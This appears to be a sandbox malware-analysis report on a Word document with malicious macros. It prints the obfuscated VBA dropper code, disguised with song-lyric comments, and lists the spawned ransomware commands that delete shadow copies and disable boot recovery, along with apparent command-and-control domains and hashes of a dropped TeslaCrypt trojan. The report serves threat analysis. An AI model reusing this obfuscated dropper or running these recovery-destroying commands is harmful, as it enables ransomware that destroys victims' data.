Sub graceful(pitied, indevotion, projector)
'Your heart's all gone
'Nothing but pills and low income
Dim unhonored As Variant
'Yeah, that's where you say you're from
'Hollywood, Hollywood
Dim nursling() As Byte
'And made you go and change your ways
'Was it worth it for the fame?
Dim brit As Integer
'A Hollywood horror
'Nothing but pills and low income
nursling = beadyeyed(pitied)
'You got me feeling some way
'Nothing but ash and broken glass
billycock = "ameba"
'You got me feeling some way
'Everybody's saying you're a monster
prerequire = projector
'So give yourself away
'A Hollywood horror
Put #prerequire, , nursling
'Yeah, that's where you say you're from
'I can see it on your face, yeah, you lost it
End Sub
'The city that, city that went
'A Hollywood horror
Function giddyhead()
'Was it worth it for the fame?
'Was it worth it for your name?
Dim bey As Variant
'Yeah, now you're walking on, walking on
'Show me how you go on the floor
Dim bihar As Variant
'Nothing but pills and low income
'Nothing but pills and low income
aristocratically = LCase("ap") + Mid("outbalancepDatstropharia", 11, 4) + Left("aorites", 1)
'Nothing but ash and broken glass
'Your heart's all gone
tortured = baize
'Yeah, now you're walking on, walking on
'The city that, city that went
Dim basiliscus As Integer
'You thought you could, thought you could
'Hollywood, Hollywood
reproduce = Environ(aristocratically)
'Was it worth it for your name?
'Old fashion pass to give yourself away
baize = baize
'Nothing but pills and low income
'Show me how you go on the floor
hummock = "defamer"
'You thought you could, thought you could
'A Hollywood horror
eden = LCase("oB") & UCase("durATE")
'The city that, city that went
'Nothing but pills and low income
giddyhead = reproduce
'Yeah, now you're living on, living on
'All the sweet talks making you exhausted
baize = "fabulous"
'You got me feeling some way
'You thought you could, thought you could
End Function
'Was it worth it for the fame?
'The city that, city that went
'Show me how you go on the floor
'Yeah, not where you're born and raised
Function naysaying()
'You got me feeling some way
'Your heart's all gone
Dim mantis As Integer
'A Hollywood horror
'Yeah, not where you're born and raised
Dim tetigit As Variant
'So give yourself away
'So I'll say this is the day you became
sorrowfu = 42 + 74 - 17 + 13211
'Hollywood, Hollywood
'Yeah, now you're walking on, walking on
baize = baize
'So I'll say this is the day you became
'A Hollywood horror
'I can see it on your face, yeah, you lost it
'Old fashion pass to give yourself away
fluted = bentley * 3
'It looks like you became
'Was it worth it for your name?
'Hollywood, Hollywood
'What happened to the you who's stronger
Dim experientiagrgnothi As Variant
'Old fashion pass to give yourself away
'A Hollywood horror
functionary = 131
'All the sweet talks making you exhausted
'Yeah, now you're living on, living on
tortured = "acoustics"
'Was it worth it for the fame?
'Show me how you go on the floor
'You got me feeling some way
'Yeah, not where you're born and raised
Dim facetious As Long
'Make it, but the city won
'So give yourself away
mesopotamia = FV(sorrowfu / 124, functionary, 5)
'Hollywood, Hollywood
'Yeah, that's where you say you're from
bentley = fluted - 209
'Yeah, now you're walking on, walking on
'Yeah, not where you're born and raised
'Was it worth it for the fame?
'It looks like you became
naysaying = mesopotamia
'The city that, city that went
'A Hollywood horror
End Function
'Make it, but the city won
'Make it, but the city won
'All the sweet talks making you exhausted
'Old fashion pass to give yourself away
'Show me how you go on the floor
'Make it, but the city won
Sub centerline(canonical, menopon)
'Yeah, not where you're born and raised
'Nothing but ash and broken glass
Dim eonian As Long
'Hollywood, Hollywood
'Nothing but pills and low income
Dim harness As String
'Everybody's saying you're a monster
'The city that, city that went
tortured = baize
'You got me feeling some way
'Hollywood, Hollywood
'Nothing but pills and low income
'Was it worth it for your name?
Open canonical For Binary Access Read Write As #menopon
'Nothing but ash and broken glass
'Was it worth it for your name?
baize = baize
'All the sweet talks making you exhausted
'All the sweet talks making you exhausted
'You thought you could, thought you could
'Was it worth it for the fame?
End Sub
'All the sweet talks making you exhausted
'Show me how you go on the floor
'And made you go and change your ways
'It looks like you became
Sub FormatMyTables()
'Make it, but the city won
'A Hollywood horror
Selection.Tables(1).Style = "Light Shading - Accent 4"
'What happened to the you who's stronger
'Your heart's all gone
Selection.SelectRow
'Show me how you go on the floor
'Old fashion pass to give yourself away
Selection.Style = ActiveDocument.Styles("Heading 2")
'Yeah, now you're living on, living on
'So I'll say this is the day you became
Selection.Tables(1).Select
'Yeah, now you're walking on, walking on
'Make it, but the city won
Selection.Tables(1).AutoFitBehavior (wdAutoFitFixed)
'Show me how you go on the floor
'And made you go and change your ways
Selection.Tables(1).Rows.Alignment = wdAlignRowCenter
'And made you go and change your ways
'\xef\xbb\xbfHollywood, Hollywood
Selection.Columns.PreferredWidthType = wdPreferredWidthPoints
'\xef\xbb\xbfHollywood, Hollywood
'\xef\xbb\xbfHollywood, Hollywood
Selection.Columns.PreferredWidth = InchesToPoints(0.6)
'\xef\xbb\xbfHollywood, Hollywood
'\xef\xbb\xbfHollywood, Hollywood
End Sub"
File "preparative.frm" (Streampath: "Macros/VBA/preparative") has code: "Private Sub UserForm_Scroll(ByVal ActionX As MSForms.fmScrollAction, ByVal ActionY As MSForms.fmScrollAction, ByVal RequestDx As Single, ByVal RequestDy As Single, ByVal ActualDx As MSForms.ReturnSingle, ByVal ActualDy As MSForms.ReturnSingle)
Dim praiseworthiness As New blueblack
Dim plasma As Variant
praiseworthiness.Name = boiler
commonwealth = praiseworthiness.naysaying
ThisDocument.sempre
End Sub" - source
- Static Parser
- relevance
- 10/10
-
Creates a writable file in a temporary directory
- details
-
"WINWORD.EXE" created file "%TEMP%\~DF90516113836340F0.TMP"
"WINWORD.EXE" created file "%TEMP%\~DF179A9DE8DECDEE82.TMP"
"WINWORD.EXE" created file "%TEMP%\VBE\MSForms.exd"
"WINWORD.EXE" created file "%TEMP%\~DFCDFAC6520AC83113.TMP"
"WINWORD.EXE" created file "%TEMP%\~DF1C54A54FD69B58B4.TMP"
"WINWORD.EXE" created file "%TEMP%\~DF73A531A31CB77CF8.TMP"
"WINWORD.EXE" created file "%TEMP%\4097074.cvr" - source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-61158"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACB10_S-1-5-5-0-61158"
"\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000" - source
- Created Mutant
- relevance
- 3/10
-
Launches a browser
- details
- Launches browser "firefox.exe" (Show Process)
- source
- Monitored Target
- relevance
- 3/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 66E10000
- source
- Loaded Module
-
Spawns new processes
- details
-
Spawned process "WmiPrvSE.exe" with commandline "%WINDIR%\system32\wbem\wmiprvse.exe -secured -Embedding" (Show Process)
Spawned process "glom.exe" (Show Process)
Spawned process "glom.exe" (Show Process)
Spawned process "explorer.exe" (Show Process)
Spawned process "firefox.exe" with commandline "-osint -url "%1"" (Show Process)
Spawned process "vssadmin.exe" with commandline "delete shadows /all /quiet" (Show Process)
Spawned process "bcdedit.exe" with commandline "bcdedit /set {default} recoveryenabled no" (Show Process)
Spawned process "bcdedit.exe" with commandline "bcdedit /set {default} bootstatuspolicy ignoreallfailures" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistance
-
Dropped files
- details
-
"~$42522e0ced9e1e8808cecaf3c33ad68ab97ad12312abee7ed523323714d1fb.doc" has type "data"
"index.dat" has type "data"
"glom.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"MSForms.exd" has type "data"
"bc42522e0ced9e1e8808cecaf3c33ad68ab97ad12312abee7ed523323714d1fb.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Hidden Archive ctime=Mon Aug 22 03:34:58 2016 mtime=Mon Aug 22 03:34:58 2016 atime=Mon Aug 22 12:34:12 2016 length=304164 window=hide"
"~$Normal.dotm" has type "data"
"4097074.cvr" has type "data"
"~WRS{D83B4034-8653-45F7-A933-5CC9F33E7623}.tmp" has type "FoxPro FPT blocks size 0 next free block index 218103808 1st used item "\375"" - source
- Binary File
- relevance
- 3/10
-
Dropped files
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "z.rg/Y]v5:111nv[$oW}k9s&vr7o'??_\rIwX2"
Pattern match: "vai.oh/?,Xtz;0~z3p.5:l7"
Heuristic match: "3tWc^u_B8.9l^k{2S^NK.+.a9,AYuvyg86~hI=89'grK<T<1bQz[b B^e+(X8.rE"
Heuristic match: "BE`xpose0TemplateDerCustomizDP Sub UserForm_Scroll(ByVal ActionX As MSas.fm" - source
- File/Memory
- relevance
- 10/10
-
Found potential URL in binary/memory
File Details
inventory_list_120570.doc
- Filename
- inventory_list_120570.doc
- Size
- 297KiB (304164 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: John, Template: Normal.dot, Last Saved By: Windows, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 02:00, Create Time/Date: Tue Jul 26 12:46:00 2016, Last Saved Time/Date: Tue Jul 26 13:00:00 2016, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
- Architecture
- WINDOWS
- SHA256
- bc42522e0ced9e1e8808cecaf3c33ad68ab97ad12312abee7ed523323714d1fb
- MD5
- 41c771339e87469eb71676b08f5529bf
- SHA1
- 32e7b826b41623709e91ba97724107c8d0ce35aa
Classification (TrID)
- 80.0% (.DOC) Microsoft Word document
- 20.0% (.) Generic OLE2 / Multistream Compound File
Screenshots
Hybrid Analysis
Analysed 9 processes in total (System Resource Monitor).
- WINWORD.EXE /n "C:\bc42522e0ced9e1e8808cecaf3c33ad68ab97ad12312abee7ed523323714d1fb.doc" (PID: 2572)
-
WmiPrvSE.exe
%WINDIR%\system32\wbem\wmiprvse.exe -secured -Embedding
(PID: 3188)
-
glom.exe
(PID: 3320)
-
glom.exe
(PID: 2608)
-
explorer.exe
(PID: 2568)
-
firefox.exe
-osint -url "%1"
(PID: 2512)
- vssadmin.exe delete shadows /all /quiet (PID: 3564)
- bcdedit.exe bcdedit /set {default} recoveryenabled no (PID: 3588)
- bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures (PID: 3648)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
moatleftbet.com | - | - | - |
heheckbitont.ru | - | - | - |
meketusebet.ru | - | - | - |
Contacted Hosts
No relevant hosts were contacted.
HTTP Traffic
No relevant HTTP requests were made.
Extracted Strings
Extracted Files
-
Malicious 1
-
-
glom.exe
- Size
- 84KiB (85504 bytes)
- Type
- PE32 executable (GUI) Intel 80386, for MS Windows
- AV Scan Result
- Labeled as "Trojan.TeslaCrypt" (14/55)
- MD5
- 7084e51dbc1a0fc050236ccfcaa31d32
- SHA1
- a4a6ff14300b7d407aa80924d403bedc64b68270
- SHA256
- 0685daeb6a2b49d151ded5d357df1c23e4df6b4390d4e4f2771724ee167997c2
-
-
Informative 7
-
-
~$42522e0ced9e1e8808cecaf3c33ad68ab97ad12312abee7ed523323714d1fb.doc
- Size
- 162B (162 bytes)
- Type
- data
- MD5
- bd49ca6be317810a39989450352f1b97
- SHA1
- 0c82f2892835b22ab3179fb63e5b173dfcb61fa5
- SHA256
- 66e301700c233a3ab3e0dbb11a92a252c87a77de161907a96b5138711d4a1bd5
-
index.dat
- Size
- 592B (592 bytes)
- Type
- data
- MD5
- fc210a22d52ee7c402091c1948da8513
- SHA1
- c4b21c5f402a7c62bc5f8cfc7491b0f73de74cff
- SHA256
- 353adf52110e551b529155841cab5f4fad6a4c897ab49279a4e174eeaafe957b
-
MSForms.exd
- Size
- 144KiB (147284 bytes)
- Type
- data
- MD5
- 573227a60a3b919c043814c44ec05730
- SHA1
- a4768474829cae31bda8601464911cbe313a3e61
- SHA256
- 4a1dd1ddd3f96b28186ccaaaa7e2442c62849bde3d86fc34bf934f94b75caaea
-
bc42522e0ced9e1e8808cecaf3c33ad68ab97ad12312abee7ed523323714d1fb.LNK
- Size
- 733B (733 bytes)
- Type
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Mon Aug 22 03:34:58 2016, mtime=Mon Aug 22 03:34:58 2016, atime=Mon Aug 22 12:34:12 2016, length=304164, window=hide
- MD5
- 414d8df116de1f10b8a281f8bcbe410a
- SHA1
- 866822f8c394ca3042ee5c7b1bea758ab867c267
- SHA256
- 09f0d131208a4ddd9dbdfc00c36177756ce627183e499c0246fab1032504944b
-
~$Normal.dotm
- Size
- 162B (162 bytes)
- Type
- data
- MD5
- bd49ca6be317810a39989450352f1b97
- SHA1
- 0c82f2892835b22ab3179fb63e5b173dfcb61fa5
- SHA256
- 66e301700c233a3ab3e0dbb11a92a252c87a77de161907a96b5138711d4a1bd5
-
4097074.cvr
- Size
- 1.7KiB (1780 bytes)
- Type
- data
- MD5
- f6404f3ce556a15be720107ac28aeb29
- SHA1
- eed905ba980341021459c1d741ad33ffc125ed1e
- SHA256
- e4019c43af68b85986e5726297917da234dd7a556827c621db93462e52626be2
-
~WRS{D83B4034-8653-45F7-A933-5CC9F33E7623}.tmp
- Size
- 1KiB (1024 bytes)
- Type
- FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375"
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
Notifications
-
Runtime
- A process crash was detected during the runtime analysis
- Not all sources for signature ID "api-55" are available in the report
- Not all sources for signature ID "hooks-8" are available in the report
- Sample was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/bc42522e0ced9e1e8808cecaf3c33ad68ab97ad12312abee7ed523323714d1fb/analysis/1471837352/")